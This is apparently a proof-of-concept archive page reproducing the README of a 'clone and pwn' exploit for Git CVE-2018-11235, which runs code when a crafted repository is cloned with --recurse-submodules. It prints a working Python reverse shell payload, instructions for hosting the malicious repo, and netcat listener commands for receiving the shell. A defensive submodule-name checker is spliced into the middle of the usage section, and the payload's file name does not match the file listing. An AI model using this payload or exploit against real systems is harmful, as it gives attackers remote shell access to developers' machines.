Associated Vulnerability
Title: Git security vulnerability (CVE-2018-11235)
Description: Git is a free, open-source distributed version control system developed by American software developer Linus Torvalds. Git contains a security vulnerability that stems from the program failing to properly validate submodule names taken from an untrusted .gitmodules file when adding them under the $GIT_DIR/modules directory. A remote attacker can exploit this vulnerability to execute arbitrary code with the help of a crafted .gitmodules file. The following versions are affected: Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, 2.1
Description
Exploits CVE-2018-11235
Readme
Headers
=========
Exploit Title: Clone and Pwn<br />
Date: June 4th, 2018<br />
Exploit Author: Alejandro Caceres<br />
Vendor Homepage: https://git-scm.com/<br />
Software Link: https://git-scm.com/downloads<br />
Version: arbitrary code is executed on Git client versions before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1<br />
Tested on: Linux: Ubuntu, Mint, MacOSX<br />
CVE : CVE-2018-11235<br />
Exploit for CVE-2018-11235 Usage
==============================
This exploit for CVE-2018-11235, dubbed clone and pwn here, creates a malicious git repo that exploits a bug in git. When the repo is cloned using the
`--recurse-submodules` flag, arbitrary code is executed on Git client versions before 2.13.7, 2.14.x before 2.14.4, 2.15.x before
2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1.
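The fix referenced in the acknowledgements below (git commit 0383bbb9) rejects any submodule name that contains a `..` path component, checking both `/` and `\` as separators. The Python below is an added example, not part of this repository, that applies the same rule to a `.gitmodules` file so a defender can flag such names before cloning with `--recurse-submodules`; the sample `.gitmodules` content and the `example.invalid` URLs are constructed.

```python
import re

# Constructed sample .gitmodules: one benign entry and one whose name
# would escape $GIT_DIR/modules via a '..' path component.
SAMPLE_GITMODULES = """\
[submodule "lib/helper"]
\tpath = lib/helper
\turl = https://example.invalid/helper.git
[submodule "../../modules/evil"]
\tpath = evil
\turl = https://example.invalid/evil.git
"""

# Matches a section header of the form [submodule "name"]
_HEADER = re.compile(r'^\s*\[submodule\s+"(.*)"\]\s*$')


def is_safe_submodule_name(name: str) -> bool:
    """Mirror git's check_submodule_name(): reject an empty name or any
    '..' path component. Both '/' and '\\' count as separators so the
    rule is identical on every platform."""
    if not name:
        return False
    return all(component != ".." for component in re.split(r"[/\\]", name))


def unsafe_submodule_names(gitmodules_text: str) -> list:
    """Return the submodule names in .gitmodules text that fail the check."""
    bad = []
    for line in gitmodules_text.splitlines():
        m = _HEADER.match(line)
        if m and not is_safe_submodule_name(m.group(1)):
            bad.append(m.group(1))
    return bad


if __name__ == "__main__":
    for name in unsafe_submodule_names(SAMPLE_GITMODULES):
        print(f"unsafe submodule name: {name!r}")
```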
To use this module, simply put it on a server with direct internet access (e.g. AWS, DigitalOcean) and open `evil.sh`. It will look
something like the following:
```python
#!/usr/bin/python
EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080
#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```
Set EXTERN_IP and EXTERN_PORT to the external IP and port you'd like to receive your reverse shell on. A reverse shell can be received with something like
`nc -l <EXTERN_IP> <EXTERN_PORT>`, e.g. `nc -l 193.23.23.32 8080`,
or with Metasploit's generic shell module. Once the user has run the command `git clone --recurse-submodules git://<your ip>/repo dest_dir`, you will receive a reverse shell.
If you're having trouble running the exploit multiple times (or after a failed attempt), check the following:
- Run `./clean.sh`; note that this deletes all data in /tmp.
- Check the processes with `ps aux | grep git` to ensure you aren't already running gitdaemon, and kill any gitdaemon processes.
Acknowledgements
----------------
Code derived from [@peff](https://github.com/peff)'s [git patch][] (look for
the `t/t7415-submodule-names.sh` test file).
As such, this repository is published under the GNU General Public License
version 2.
Additional fix for older versions of git courtesy of
[@atorralba](https://github.com/atorralba)
([details in this post](https://atorralba.github.io/CVE-2018-11235/)).
[git patch]: https://github.com/git/git/commit/0383bbb9015898cbc79abd7b64316484d7713b44
This script is adapted from https://github.com/Rogdham/CVE-2018-11235, with much love and credit.
=======
# clone_and_pwn
Exploits CVE-2018-11235
By @_hyp3ri0n and @mehaase
File Snapshot
[4.0K] /data/pocs/73db323a9af7618d38b75b668d353d517ef77218
├── [1.1K] build.sh
├── [ 55] clean.sh
├── [ 331] evil.py
└── [2.6K] README.md
0 directories, 4 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.